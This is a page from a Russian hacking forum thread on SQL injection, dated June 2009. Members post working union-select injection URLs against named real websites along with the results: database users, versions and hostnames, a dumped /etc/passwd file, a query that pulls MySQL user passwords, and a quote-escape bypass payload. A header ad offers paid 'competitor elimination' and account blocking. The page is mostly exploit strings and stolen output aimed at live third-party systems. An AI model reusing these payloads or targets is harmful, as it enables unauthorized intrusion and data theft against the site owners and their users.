Форум АНТИЧАТ - SQL Инъекции

УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz

		Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
SQL Инъекции

Страница 988 из 1242

988

Опции темы

Поиск в этой теме

Опции просмотра

#9871

14.06.2009, 12:27

mailbrush

Познавший АНТИЧАТ

Регистрация: 24.06.2008

Сообщений: 1,996

Провел на форуме:
6075534

Репутация: 2731

Отправить сообщение для mailbrush с помощью ICQ

amigo-bike.ru

Код:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user(),database(),version()),8,9,10,11,12,13,14,15,16,17

Код:

webadmin@localhost:amigo:5.0.32-Debian_7etch6-log

Код:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,LOAD_FILE(0x2F6574632F706173737764),8,9,10,11,12,13,14,15,16,17

Код:

root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh backup:x:34:34:backup:/var/backups:/bin/sh list:x:38:38:Mailing List Manager:/var/list:/bin/sh irc:x:39:39:ircd:/var/run/ircd:/bin/sh gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh nobody:x:65534:65534:nobody:/nonexistent:/bin/sh Debian-exim:x:102:102::/var/spool/exim4:/bin/false test:x:1000:1000:test,,,:/home/test:/bin/bash sshd:x:100:65534::/var/run/sshd:/bin/false bind:x:101:104::/var/cache/bind:/bin/false mysql:x:103:105:MySQL Server,,,:/var/lib/mysql:/bin/false postfix:x:104:106::/var/spool/postfix:/bin/false www-data:x:999:999:www-data:/var/www:/bin/sh avdaemon:x:1001:1001:AVP Daemon:/non/existant:/bin/false avclient:x:1002:1001:AVP Client:/non/existant:/bin/false ftp:x:1003:1003::/tmp:/bin/false kiel:x:1004:1004::/srv/kiel.ru:/bin/false mzbask:x:1005:1005::/srv/mzbask.ru:/bin/false kontrakt-plus:x:1006:1006::/srv/kontrakt-plus.ru:/bin/false universam1:x:1007:1007::/srv/universam1.ru:/bin/false tdzko:x:1008:1008::/srv/tdzko.ru:/bin/false heartsunionru:x:1009:1009::/home/heartsunionru:/bin/flase parus-anapa:x:1010:1010::/home/parus-anapa:/bin/false mailflt3:x:1011:1011:Kaspersky Anti-Spam user:/usr/local/ap-mailfilter3/run:/bin/false misha:x:1012:1012::/home/misha:/bin/sh sasha:x:1013:1013::/home/sasha:/bin/false postgrey:x:110:110::/var/lib/postgrey:/bin/false patrul880:x:1014:1014::/home/patrul880:/bin/false reklama42:x:1015:100::/home/reklama42:/bin/false pressasibiri:x:1016:1015::/home/pressasibiri:/bin/false kemgmli:x:1017:1016::/home/kemgmli:/bin/false postgres:x:1018:1018:,,,:/home/postgres:/bin/bash

Код:

http://www.amigo-bike.ru/catalog/moto.php?id=-1+union+select+1,2,3,4,5,6,concat_ws(0x3a,user,password),8,9,10,11,12,13,14,15,16,17+from+mysql.user

scooters.moto-bike.ru

Код:

http://www.scooters.moto-bike.ru/moto.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6/*

Код:

mataru_moto@localhost:mataru_moto:5.0.26-log

Последний раз редактировалось jokester; 14.06.2009 в 15:28..

#9872

14.06.2009, 14:18

Fata1ex

Постоянный

Регистрация: 12.12.2006

Сообщений: 906

Провел на форуме:
4205500

Репутация: 930

Код:

www.safariexpo.ru/news/?id=-1+order+by+9/*
www.garms.ru/deps.php?dep=hunt&rid=-1+order+by+2/*

mailbrush, перечитай правила - постить пароли запрещено.

#9873

14.06.2009, 16:29

SkyLine32

Участник форума

Регистрация: 01.03.2009

Сообщений: 121

Провел на форуме:
4022236

Репутация: 38

Отправить сообщение для SkyLine32 с помощью ICQ

Отправить сообщение для SkyLine32 с помощью AIM

Отправить сообщение для SkyLine32 с помощью MSN

Отправить сообщение для SkyLine32 с помощью Yahoo

PR 4

Цитата:

http://www.vanguardassurance.com/news-events/newsdetails.php?id=-74+union+select+1,concat_ws(version(),database(),u ser()),3,4,5,6,7,8,9--

Database Version: 4.1.22-standard-log
Database name: 334903_vanguardcms
User name: 334903_alfred@172.16.10.133

Цитата:

http://metropolehaiti.ht/metropole/full_une_fr.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3,4,5,6,7--

Database Version: 5.0.77-community
Database name: metropol_metropolehaiti
User name: metropol_metropo@localhost

Цитата:

http://www.cohadde.org/about/lecture.php?id=1+union+select+concat_ws(version(), database(),user())--

Database Version: 5.0.75-community-log
Database name: bonzouti_cohadde
User name: bonzouti_goldo@localhost

PR 4

Цитата:

http://www.dmc.ee/byro/showtech.php?id=-1+union+select+1,2,concat_ws(version(),database(), user()),4,5,6--

Database Version: 5.0.81-community
Database name: wdmc_dmc
User name: wdmc_wdmc@localhost

Цитата:

http://www.eestishaping.ee/index.php?site=2&id=-0+union+select+1,2,3,4,5,6,concat_ws(version(),dat abase(),user()),8--

Database Version: 5.1.35
Database name: d9992sd7549
User name: d9992sa12606@z136.zone.ee

Последний раз редактировалось SkyLine32; 14.06.2009 в 16:52..

#9874

14.06.2009, 16:38

pelligrim

Познающий

Регистрация: 26.04.2008

Сообщений: 31

Провел на форуме:
31474

Репутация: 53

Код HTML:

http://shans.com.ua/?m=nr&in=212&ir=1&id=-23136+union+select+1,concat_ws(0x3a,version(),user(),database()),3--

5.0.81-log:shansco_igor@second.hosted.in:shansco_shans

Код HTML:

http://dhp.com.ua/pers_news.php?id=-21+union+select+1,2,3,4,5,concat_ws(0x3a,version(),user(),database()),7,8--

5.0.82:admindhp@localhost:dhp

#9875

14.06.2009, 16:57

~~farex~~

Banned

Регистрация: 11.03.2009

Сообщений: 214

Провел на форуме:
914766

Репутация: 317

CHAPEL OF THE HIGHLANDS

Код:

http://www.chapelofthehighlands.com/ecards/getnewsitem.php?newsid=1+union+select+1,2,concat_ws(0x3a2a3a,version(),database(),user(),@@version_compile_os),4,5--

5.0.75-community-log*:*chapelo3_ecards*:*chapelo3_chapel@localhost* :*redhat-linux-gnu

#9876

14.06.2009, 23:17

M.W.N.N.

Участник форума

Регистрация: 05.01.2009

Сообщений: 191

Провел на форуме:
3020589

Репутация: 240

Код:

http://www.solmetec.com.ve/ver_producto.php?id=229+union+select+1,concat_ws(0x3a,version(),database(),user()),3,4,5,6,7,8,9,10,11,12,13,14,15,16++limit+1,1/*

version():4.1.22-standard
database():solmetec_bd
user():solmetec_web@localhost

#9877

15.06.2009, 03:26

BHYCHIK

Познающий

Регистрация: 30.01.2009

Сообщений: 64

Провел на форуме:
550208

Репутация: 94

http://www.mlauto.ru/cars.htm?carid=-27+union+select+concat_ws(0x3a,database(),version( ),user(),@@version_compile_os),2,3,4,5,6,7,8,9,10, 11,12,13,14,15,16,17,18,19,20,21--+

Database: mlauto79
Version: 4.0.27-max-log
OS: unknown-freebsd4.7
User: mlauto79@v16.valuehost.ru

#9878

15.06.2009, 09:37

HAXTA4OK

Reservists Of Antichat - Level 6

Регистрация: 15.03.2009

Сообщений: 560

Провел на форуме:
4358210

Репутация: 2017

http://www.rutka.net/index.php?novica=337&arhiv=0&p=0&komentarji=0&para metri=naj-bo-nasa-rutka-se-boljsa-z-vasimi-prispevki-dragi-instuktorji&ca_m=6&ca_y=2009&id=1+and+substring(ve rsion(),1,1)=5

Последний раз редактировалось jokester; 15.06.2009 в 11:06.. Причина: depts.washington.edu БОЯН

#9879

15.06.2009, 11:08

rolex

Познающий

Регистрация: 07.04.2009

Сообщений: 40

Провел на форуме:
8945659

Репутация: 103

Отправить сообщение для rolex с помощью ICQ

Цитата:

http://www.judaicashuk.com/article.php?id=-1+union+select+1,concat_ws(0x3a,database(),version (),user()),3--

gordons1_judaicashuk:5.0.75-community-log:gordons1_yarok@localhost

//-----------------------------------------------------------------//

Цитата:

http://www.elsy.com.ua/article.php?cid=4&id=1&l=2+union+select+111,222,33 3,concat_ws(0x3a,database(),version(),user()),555--

elsyvid_elsydata:4.1.22-standard-log:elsyvid_elsyuser@216.240.57.214

//-----------------------------------------------------------------//

Цитата:

http://www.hidglobal.com/article.php?id=1+union+select+concat_ws(0x3a,datab ase(),version(),user()),2--

hidcorp:5.0.51a-log:webUser@ws1.hidglobal.com

#9880

15.06.2009, 12:04

BlackSun

Members of Antichat - Level 5

Регистрация: 01.04.2007

Сообщений: 1,268

Провел на форуме:
10046345

Репутация: 4589

http://webmuseum.mit.edu/info.php?&v=1&s=-1+union+select+1,2,3,4,concat_ws(0x3a,user(),versi on()),6,7,8,9,10,11,12,13,14,15+--+&type=exh&t=exhibitions
Mobius@localhost:5.0.41-community-nt
2:admin@mit.mit:<pwd_cutted>

http://webmuseum.mit.edu/grabimg.php?wm=1&kv=-1+union+select+1,'../../grabimg.php'+--+

user.php
$addedterm = strtoupper($field) . " = '" . str_replace("'","\'",$criteria) . "'";

a\' OR EMAIL=0x61646d696e406d69742e6d6974 -- -;asdasd

Последний раз редактировалось BlackSun; 15.06.2009 в 12:07..

Страница 988 из 1242

988

« Предыдущая тема | Следующая тема »

Похожие темы
Тема	Автор	Раздел	Ответов	Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая	k00p3r	Чужие Статьи	0	13.06.2005 11:26
SQL инъекция и Oracle, часть 2	k00p3r	Чужие Статьи	0	13.06.2005 11:24
Sql инъекция и Oracle, часть первая	k00p3r	Чужие Статьи	0	13.06.2005 11:23
Внедрение Sql кода с завязанными глазами	k00p3r	Чужие Статьи	0	12.06.2005 20:48
SQL Injection в Oracle	k00p3r	Чужие Статьи	0	12.06.2005 12:41

Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)

Быстрый переход